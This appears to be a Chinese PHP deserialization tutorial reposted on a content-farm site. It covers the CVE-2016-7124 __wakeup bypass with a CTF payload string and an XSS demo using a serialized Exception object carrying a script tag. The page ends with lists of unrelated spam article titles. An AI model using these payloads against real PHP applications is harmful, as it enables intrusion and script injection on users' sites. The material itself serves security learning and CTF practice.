当前位置: 首页 > wzjs >正文

图书馆网站建设情况汇报今日全国疫情最新消息

图书馆网站建设情况汇报,今日全国疫情最新消息,域名停靠app下载网站,wordpress 无刷新分页目录 PHP-属性权限特征-共有&私有&保护 PHP-绕过漏洞-CVE&字符串逃逸 PHP-原生类获取&利用&配合 原生类利用简单案例Demo-XSS PHP-属性权限特征-共有&私有&保护 1、对象变量权限: public(公共的):在本类内部、外部类、子类都可以访…

目录

PHP-属性权限特征-共有&私有&保护

PHP-绕过漏洞-CVE&字符串逃逸

PHP-原生类获取&利用&配合

原生类利用简单案例Demo-XSS


PHP-属性权限特征-共有&私有&保护


1、对象变量权限:
public(公共的):在本类内部、外部类、子类都可以访问
protect(受保护的):只有本类或子类或父类中可以访问
private(私人的):只有本类内部可以使用
2、序列化数据显示:
public 属性序列化的时候格式是正常成员名
private 属性序列化的时候格式是%00 类名%00 成员名
protect 属性序列化的时候格式是%00*%00 成员名

%00代表 NULL 字节,下面代码为了直观显示,使用var_export函数进行转义显示未\0

PHP-绕过漏洞-CVE-2016-7124


1、CVE-2016-7124(__wakeup 绕过)
漏洞编号:CVE-2016-7124
影响版本:PHP 5<5.6.25; PHP 7<7.0.10
漏洞危害:如存在__wakeup 方法,调用 unserilize()方法前则先调用__wakeup 方
法,但序列化字符串中表示对象属性个数的值大于真实属性个数时会跳过__wakeup 执行

<?php
header("Content-type: text/html; charset=utf-8");
//public private protected 说明
class test{public $name;private $age;protected $sex;public function __construct($name,$age,$sex){echo "__construct被调用\n";}public function __wakeup(){echo '反序列化时__wakeup被执行!!!';}
}unserialize($_GET['x']);

 正常情况下在反序列化时,__weakeup被调用

 但序列化字符串中表示对象属性个数的值大于真实属性个数时会跳过__wakeup 执行

测试使用的php版本在漏洞范围内

 

案例:
[极客大挑战 2019]PHP


1、下载源码www.zip分析,触发 flag 条件


2、从代码上看,需要username=admin才能输出flag,但是由于反序列化必然会执行__wakeup 强制改变 username 值,且通过传入select参数反序列化


3、利用语言漏洞绕过 CVE-2016-7124,随便传入一个值可以看到php版本在漏洞范围内


4、构造 payload 后 修改满足漏洞条件触发

payload:O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

 注意改变属性个数

PHP-原生类获取&利用&配合

原生类(Native class)是指在编程语言的核心库或标准库中提供的类,这些类是语言本身提供的,而不是由用户自定义的类。原生类通常包含语言内置的功能和特性,用于解决常见的编程任务和操作。

PHP原生类使用场景:在代码中没有看到魔术方法的情况下使用的,如果对方环境没有开启相关模块功能,那么是没用的。

使用脚本在本地生成原生类,需要再php.ini文件中尽可能打开多的模块,这样可以生成更多可利用的原生类。代码如下:

<?php
$classes = get_declared_classes();
foreach ($classes as $class) {$methods = get_class_methods($class);foreach ($methods as $method) {if (in_array($method, array('__destruct','__toString','__wakeup','__call','__callStatic','__get','__set','__isset','__unset','__invoke','__set_state'))) {print $class . '::' . $method . "\n";}}
}

 找到php.ini文件

 

原生类利用简单案例Demo-XSS

<?php
highlight_file(__file__);
$a = unserialize($_GET['k']);
echo $a;
?>

思路:

1.先看能触发的魔术方法-echo能够触发__toString方法
2.代码中没写魔术方法调用逻辑,那就需要用到原生类
3.使用魔术方法的原生类去利用
4.获取魔术方法的原生类(使用脚本去生成,生成多少与当前环境模块开关有关
默认的原生类生成脚本有太多原生类和方法了,这里只保留__toString方法,生成其有的原生类)

 创建一个异常对象,并序列化

<?php
$a=new Exception("<script>alert('xiaodi')</script>");
echo urlencode(serialize($a));
?>

代码中echo一个反序列化的对象,是会异常的,php中对象不能转换为字符串,故而形成了pop链。

创建异常对象(产生异常返回xss代码)  ->  传入序列化后的异常对象  ->  echo 反序列化得到异常对象  ->  对象不能转字符串(异常返回xss代码)  ->  echo触发toString将返回的xss代码输出被浏览器渲染

http://www.dtcms.com/wzjs/248512.html

相关文章:

  • 如何做视频门户网站商城全网推广运营公司
  • 找钟点工做的网站校园推广
  • wordpress网址设置seo搜索引擎优化内容
  • 周浦手机网站建设公司营销网络图
  • 做网站先建立模型app推广在哪里可以接单
  • 做网站的疑问有哪些百度用户服务中心电话
  • 站长工具是什么网站模板之家免费下载
  • 虚拟空间可以做视频网站么代刷网站推广免费
  • wordpress 关站站长查询域名
  • 做网站开发要学什么语言太原百度关键词排名
  • 建立网站时要采用一定的链接结构可采用的基本方式有关键字排名查询
  • 给甜品网站做seo厦门人才网app
  • 江苏网站建设平台桌子seo关键词
  • 网站编辑是什么东莞快速优化排名
  • 网站运营每天做的优化网站怎么做
  • 网上购物网站设计百度百家官网入口
  • 微信小程序网站开发网站seo整站优化
  • 化工网站源码关键字挖掘机爱站网
  • wordpress获取当前子分类整站优化推广
  • axure rp可以做网站吗京东seo搜索优化
  • 北京pc端网站开发seo技术教程
  • 南京建设行政主管部门网站口碑营销的产品有哪些
  • 广东网站设计推荐免费发布产品的网站
  • 上海南桥网站建设高端网站建设
  • 网站设计经典案例分析seo优化方法有哪些
  • 网站开发加维护大概多少钱域名查询138ip
  • wordpress为自定义文章类型模板杭州百度推广优化排名
  • 网站设计一个版块东莞网站推广及优化
  • 电脑做网站主机空间如何将网站的关键词排名优化
  • 电商网站运营步骤关键词全网搜索